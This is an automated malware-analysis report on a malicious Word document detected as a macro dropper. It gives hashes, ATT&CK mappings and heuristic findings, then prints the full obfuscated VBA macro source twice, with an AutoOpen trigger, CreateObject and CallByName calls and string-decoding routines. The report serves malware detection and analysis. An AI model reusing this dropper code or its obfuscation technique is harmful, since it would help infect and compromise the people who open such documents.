Office (OLE) malware analysis — malicious · 7b718e92b365e9ec

MALICIOUS

Office (OLE)

69.0 KB Created: 2018-06-07 09:44:00 Authoring application: Microsoft Office Word First seen: 2021-08-20

MD5: 22f131fd02ccd69d48d9ef9dde51bcef SHA-1: fa6d4a5e5a37f0e6e2a8edb33f985842298b1b7f SHA-256: 7b718e92b365e9ec72ff107d47e29bb9eaacca5e0dfb63a6f7a2cef4a9ac53a9

250 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1071.001 Web Protocols

The sample is a malicious Office document containing VBA macros. The document body explicitly instructs the user to 'Enable Edit' and 'Enable Content' to bypass security warnings, a common lure for macro-based malware. The VBA script uses `CreateObject` and `CallByName` functions, indicative of malicious activity, and ClamAV identifies it as 'Doc.Dropper.Agent-6576001-0'. The script's primary function appears to be downloading and executing a second-stage payload, though the exact mechanism is obfuscated.

Heuristics 9

ClamAV: Doc.Dropper.Agent-6576001-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6576001-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set mpegjoshua = CreateObject(vityushka)
```

CallByName call high OLE_VBA_CALLBYNAME

CallByName call

Matched line in script

CallByName vs052505, DAVILLE7(dossoccer), VbMethod, lucybond.Vudmond, avorithS, aposacho

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutOOpen()
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7855 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7855 bytes
SHA-256: `eae231d460f5357c94d5e5389c1a98da1401d736b31d09dd845f6b4b2dba8005`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutOOpen() studerag = 67 - 58 digital988 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 End Sub Attribute VB_Name = "ANIHAVILAZ2" Attribute VB_Base = "0{EF16E284-5CAF-44A2-A738-A5DCA4939946}{34C9F1E1-D62A-40AF-AC69-B509B668ED99}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "lucybond" Attribute VB_Base = "0{9CE1AA7D-7AF2-4D75-AAB0-6FEC926D4B7D}{D60FB3D3-3EBA-4BCA-A2FE-2274598A1967}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub AVEHSDALM_Change() End Sub Private Sub brbnf1993_Change() End Sub Private Sub carlpsycho_Change() End Sub Private Sub KUHCNILES_Change() End Sub Private Sub REHCATSIO_Change() End Sub Private Sub Vudmond_Change() Set mpegjoshua = CreateObject(vityushka) lourdose = 8 - 20 lourdose = 12 * lourdos lourdose = lourdose - 36 - lourdose * lourdos lourdose = 68 - 11 - 63 - lourdose * 6 az673080 mpegjoshua End Sub Attribute VB_Name = "thpskoda" Attribute VB_Base = "0{13C0BFEB-9CE4-445E-81DD-544CFB62B49F}{281A5203-C989-4D7D-9977-3655ABCF5DD1}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "unicorn233" Attribute VB_Base = "0{B8204855-D961-4C08-A568-FB2B2B64DB45}{300735BB-3777-4A5F-B57C-BD16B222E9A7}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub russellnss_Change() cinemacinema = VOKINDEBO(ri654321) craplist = VOKINDEBO(ri654321) angelgrl = VOKINDEBO(drilhunc) trypspla = VOKINDEBO(drilhunc) ANIDAYRBA = 21 + 34 ANIDAYRBA = 73 * ANIDAYRBA * 5 ANIDAYRBA = 40 - 81 * 85 + 56 - 5 ANIDAYRBA = 55 - 72 + ANIDAYRB ANIDAYRBA = 38 + 91 * 39 + 57 - 4 olivermac cinemacinema, craplist, angelgrl, trypspla End Sub Attribute VB_Name = "antirace" Function flicumbn() flicumbn = ".]hQ]ccg;wha[im]/lEmaQRhumE.]/" End Function Function ri654321() ri654321 = ANIHAVILAZ2.avolahcilo End Function Function drilhunc() drilhunc = lucybond.brbnf1993 End Function Function DAVILLE7(asdfghsen) padshi13 = "" studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 future1972 = Len(asdfghsen) For imurik46 = 1 To future1972 studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 padshi13 = padshi13 + james889(GNIGNAHC(asdfghsen, imurik46), 4) Next imurik46 studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 DAVILLE7 = padshi13 End Function Function martin1971() martin1971 = unicorn233.slapdays End Function Attribute VB_Name = "docradio" Function teenocks() teenocks = lucybond.AVEHSDALM End Function Function olivermac(server101, boogersony, ostinreason, vokzirga) studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 lucybond.Vudmond = avoknepolh(server101, boogersony) + hei666888(server101, ostinreason) + rhODin80(vokzirga) End Function Function ariadna() ariadna = "h[/igplia[shEmaQRhumE.]/" End Function Function VOKINDEBO(quamiasi) bloonlet = AVOMUSAYM(9, 4) - 1 esschoki9 = AVOMUSAYM(53, 1) studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 sbdclennon = GNIGNAHC(onereefer, esschoki9) For karamuck = 2 To bloonlet esschoki9 = AVOMUSAYM(27, 1) studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 sbdclennon = sbdclennon + GNIGNAHC(quamiasi, esschoki9) Next karamuck studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 esschoki9 = AVOMUSAYM(37, 1) VOKINDEBO = royalsmom(sbdclennon, esschoki9) End Function Function royalsmom(bastgurt, NILRAHCAK) royalsmom = bastgurt + GNIGNAHC(teenocks, NILRAHCAK) End Function Attribute VB_Name = "mudpie76" Function james889(bripaseo As String, November1878 As Integer) As String Dim xiong222 As Integer xiong222 = 0 studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 For lafrench = 1 To 90 If (GNIGNAHC(martin1971, lafrench) = bripaseo) Then xiong222 = lafrench Exit For studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 End If Next lafrench studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 xiong222 = IIf(xiong222 - November1878 <= 0, 90 + xiong222 - November1878, xiong222 - November1878) james889 = GNIGNAHC(martin1971, xiong222) End Function Function hei666888(dendalta, goldgarden) studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 hei666888 = DAVILLE7(thpskoda.CGFKMYSQ) + goldgarden + DAVILLE7(thpskoda.asdfword97) + _ goldgarden + DAVILLE7(thpskoda.mayzylci) + dendalta + _ DAVILLE7(ANIHAVILAZ2.folkthre + flicumbn + ANIHAVILAZ2.pnasty24) + dendalta + DAVILLE7(ANIHAVILAZ2.folkthre) End Function Sub az673080(vs052505) dossoccer = "I[/" avorithS = 0 aposacho = True CallByName vs052505, DAVILLE7(dossoccer), VbMethod, lucybond.Vudmond, avorithS, aposacho End Sub Function GNIGNAHC(smilesrom, voknizirB) justinrom = Left(smilesrom, voknizirB) GNIGNAHC = izecubez(justinrom) End Function Function izecubez(neannium) izecubez = Right(neannium, 1) End Function Attribute VB_Name = "Rolladen" Function vityushka() vityushka = paulpacers End Function Function paulpacers() studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 paulpacers = DAVILLE7(ANIHAVILAZ2.Simulate) End Function Function rhODin80(rafeliab) studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 rhODin80 = DAVILLE7(ariadna + ANIHAVILAZ2.OKNERAYLIM) + rafeliab + _ DAVILLE7(ANIHAVILAZ2.bitterb3) + rafeliab + DAVILLE7(unicorn233.bensongary) End Function Function avoknepolh(wallyfrank, oliveemily) studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 avoknepolh = DAVILLE7(lucybond.KUHCNILES) + wallyfrank + DAVILLE7(thpskoda.umnsones) + _ oliveemily + DAVILLE7(lucybond.REHCATSIO + lucybond.carlpsycho) + oliveemily End Function Function onereefer() onereefer = unicorn233.tempdiablo End Function Attribute VB_Name = "threnviz" Function AVOMUSAYM(warykafc, mulbebpr) AVOMUSAYM = juliatemp(Int((warykafc * jimbobshit()) + mulbebpr)) End Function Function juliatemp(renhoek1) studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 juliatemp = CInt(renhoek1) End Function Sub digital988() studerag = 67 - 58 studerag = 23 + 26 * studera studerag = studerag * studerag - 75 * 2 - 1 unicorn233.russellnss = "willie09" End Sub Function jimbobshit() visamickey = 75 * 67 visamickey = 21 * 17 - 36 - 4 visamickey = visamickey + visamickey * 5 visamickey = visamickey - 64 * 18 + 4 jimbobshit = Rnd() End Function

SHA-256: eae231d460f5357c94d5e5389c1a98da1401d736b31d09dd845f6b4b2dba8005

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
studerag = 67 - 58
digital988
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
End Sub

Attribute VB_Name = "ANIHAVILAZ2"
Attribute VB_Base = "0{EF16E284-5CAF-44A2-A738-A5DCA4939946}{34C9F1E1-D62A-40AF-AC69-B509B668ED99}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "lucybond"
Attribute VB_Base = "0{9CE1AA7D-7AF2-4D75-AAB0-6FEC926D4B7D}{D60FB3D3-3EBA-4BCA-A2FE-2274598A1967}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub AVEHSDALM_Change()

End Sub

Private Sub brbnf1993_Change()

End Sub

Private Sub carlpsycho_Change()

End Sub

Private Sub KUHCNILES_Change()

End Sub

Private Sub REHCATSIO_Change()

End Sub

Private Sub Vudmond_Change()
Set mpegjoshua = CreateObject(vityushka)
lourdose = 8 - 20
lourdose = 12 * lourdos
lourdose = lourdose - 36 - lourdose * lourdos
lourdose = 68 - 11 - 63 - lourdose * 6
az673080 mpegjoshua
End Sub

Attribute VB_Name = "thpskoda"
Attribute VB_Base = "0{13C0BFEB-9CE4-445E-81DD-544CFB62B49F}{281A5203-C989-4D7D-9977-3655ABCF5DD1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "unicorn233"
Attribute VB_Base = "0{B8204855-D961-4C08-A568-FB2B2B64DB45}{300735BB-3777-4A5F-B57C-BD16B222E9A7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub russellnss_Change()
cinemacinema = VOKINDEBO(ri654321)
craplist = VOKINDEBO(ri654321)
angelgrl = VOKINDEBO(drilhunc)
trypspla = VOKINDEBO(drilhunc)
ANIDAYRBA = 21 + 34
ANIDAYRBA = 73 * ANIDAYRBA * 5
ANIDAYRBA = 40 - 81 * 85 + 56 - 5
ANIDAYRBA = 55 - 72 + ANIDAYRB
ANIDAYRBA = 38 + 91 * 39 + 57 - 4
olivermac cinemacinema, craplist, angelgrl, trypspla
End Sub

Attribute VB_Name = "antirace"
Function flicumbn()
flicumbn = ".]hQ]ccg;wha[im]/lEmaQRhumE.]/"
End Function

Function ri654321()
ri654321 = ANIHAVILAZ2.avolahcilo
End Function

Function drilhunc()
drilhunc = lucybond.brbnf1993
End Function

Function DAVILLE7(asdfghsen)
padshi13 = ""
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
future1972 = Len(asdfghsen)
For imurik46 = 1 To future1972
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
padshi13 = padshi13 + james889(GNIGNAHC(asdfghsen, imurik46), 4)
Next imurik46
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
DAVILLE7 = padshi13
End Function

Function martin1971()
martin1971 = unicorn233.slapdays
End Function


Attribute VB_Name = "docradio"
Function teenocks()
teenocks = lucybond.AVEHSDALM
End Function

Function olivermac(server101, boogersony, ostinreason, vokzirga)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
lucybond.Vudmond = avoknepolh(server101, boogersony) + hei666888(server101, ostinreason) + rhODin80(vokzirga)
End Function

Function ariadna()
ariadna = "h[/igplia[shEmaQRhumE.]/"
End Function

Function VOKINDEBO(quamiasi)
bloonlet = AVOMUSAYM(9, 4) - 1
esschoki9 = AVOMUSAYM(53, 1)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
sbdclennon = GNIGNAHC(onereefer, esschoki9)
For karamuck = 2 To bloonlet
esschoki9 = AVOMUSAYM(27, 1)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
sbdclennon = sbdclennon + GNIGNAHC(quamiasi, esschoki9)
Next karamuck
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
esschoki9 = AVOMUSAYM(37, 1)
VOKINDEBO = royalsmom(sbdclennon, esschoki9)
End Function

Function royalsmom(bastgurt, NILRAHCAK)
royalsmom = bastgurt + GNIGNAHC(teenocks, NILRAHCAK)
End Function


Attribute VB_Name = "mudpie76"
Function james889(bripaseo As String, November1878 As Integer) As String
Dim xiong222 As Integer
xiong222 = 0
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
For lafrench = 1 To 90
If (GNIGNAHC(martin1971, lafrench) = bripaseo) Then
   xiong222 = lafrench
    Exit For
    studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
End If
Next lafrench
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
xiong222 = IIf(xiong222 - November1878 <= 0, 90 + xiong222 - November1878, xiong222 - November1878)
james889 = GNIGNAHC(martin1971, xiong222)
End Function

Function hei666888(dendalta, goldgarden)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
hei666888 = DAVILLE7(thpskoda.CGFKMYSQ) + goldgarden + DAVILLE7(thpskoda.asdfword97) + _
goldgarden + DAVILLE7(thpskoda.mayzylci) + dendalta + _
DAVILLE7(ANIHAVILAZ2.folkthre + flicumbn + ANIHAVILAZ2.pnasty24) + dendalta + DAVILLE7(ANIHAVILAZ2.folkthre)
End Function

Sub az673080(vs052505)
dossoccer = "I[/"
avorithS = 0
aposacho = True
CallByName vs052505, DAVILLE7(dossoccer), VbMethod, lucybond.Vudmond, avorithS, aposacho
End Sub

Function GNIGNAHC(smilesrom, voknizirB)
justinrom = Left(smilesrom, voknizirB)
GNIGNAHC = izecubez(justinrom)
End Function

Function izecubez(neannium)
izecubez = Right(neannium, 1)
End Function


Attribute VB_Name = "Rolladen"
Function vityushka()
vityushka = paulpacers
End Function

Function paulpacers()
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
paulpacers = DAVILLE7(ANIHAVILAZ2.Simulate)
End Function

Function rhODin80(rafeliab)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
rhODin80 = DAVILLE7(ariadna + ANIHAVILAZ2.OKNERAYLIM) + rafeliab + _
DAVILLE7(ANIHAVILAZ2.bitterb3) + rafeliab + DAVILLE7(unicorn233.bensongary)
End Function

Function avoknepolh(wallyfrank, oliveemily)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
avoknepolh = DAVILLE7(lucybond.KUHCNILES) + wallyfrank + DAVILLE7(thpskoda.umnsones) + _
 oliveemily + DAVILLE7(lucybond.REHCATSIO + lucybond.carlpsycho) + oliveemily
End Function

Function onereefer()
onereefer = unicorn233.tempdiablo
End Function


Attribute VB_Name = "threnviz"
Function AVOMUSAYM(warykafc, mulbebpr)
AVOMUSAYM = juliatemp(Int((warykafc * jimbobshit()) + mulbebpr))
End Function

Function juliatemp(renhoek1)
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
juliatemp = CInt(renhoek1)
End Function

Sub digital988()
studerag = 67 - 58
studerag = 23 + 26 * studera
studerag = studerag * studerag - 75 * 2 - 1
unicorn233.russellnss = "willie09"
End Sub

Function jimbobshit()
visamickey = 75 * 67
visamickey = 21 * 17 - 36 - 4
visamickey = visamickey + visamickey * 5
visamickey = visamickey - 64 * 18 + 4
jimbobshit = Rnd()
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.